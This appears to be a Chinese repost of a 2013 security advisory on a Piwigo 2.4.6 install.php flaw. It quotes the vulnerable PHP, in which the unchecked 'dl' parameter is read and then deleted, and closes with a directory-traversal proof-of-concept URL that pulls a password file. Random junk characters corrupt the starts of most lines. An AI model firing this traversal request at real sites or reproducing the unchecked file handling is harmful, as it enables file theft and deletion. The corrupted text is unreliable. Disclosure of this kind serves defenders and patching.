Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。
  y! C3 G) R+ ~4 i& F
  f: d/ L7 B8 F) R" `. N( DPiwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
3 t8 z8 _* P6 N3 U" S====================================================================
! V: @- X  z4 F/install.php:
, ~: B& W4 R* D" ^' u' A" W8 o  U4 i-------------
$ n7 A$ W3 L/ k, V113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
' ^& b) f# F7 U, u' F( @9 O) O114: {
0 d8 D# p: S0 r# t7 ]115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
116:   header('Cache-Control: no-cache, must-revalidate');
& ~3 }5 g$ ~) c' V117:   header('Pragma: no-cache');
118:   header('Content-Disposition: attachment; filename="database.inc.php"');
119:   header('Content-Transfer-Encoding: binary');
7 X8 R! x+ d0 o$ l- V5 ]120:   header('Content-Length: '.filesize($filename));
121:   echo file_get_contents($filename);
% z; b/ F: r$ a& n; P0 z( E3 X122:   unlink($filename);
123:   exit();
/ ^6 e7 E0 a! Z* l$ g124: }
5 L5 U$ N: U9 T$ B" e====================================================================
+ |9 g. X/ C- e  k% L( [5 ^, a
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
$ [% f+ R+ |, G- C           Apache 2.4.2 (Win32)
2 @" {5 p3 X7 n% `! @           PHP 5.4.4
           MySQL 5.5.25a
( `6 R6 S4 X0 s
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

7 {$ Z3 o- Q0 E# c6 KAdvisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
* Z' ?1 x, z% F( T+ n5 ^! _Vendor Patch: http://piwigo.org/bugs/view.php?id=2843
, {* a7 k: p7 J' J
7 a- G" N" u! d! y15.02.2013
+ v% k* o3 r3 f9 z' E9 L7 f5 a
--
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt

9 f. D) n8 g1 Q4 g9 G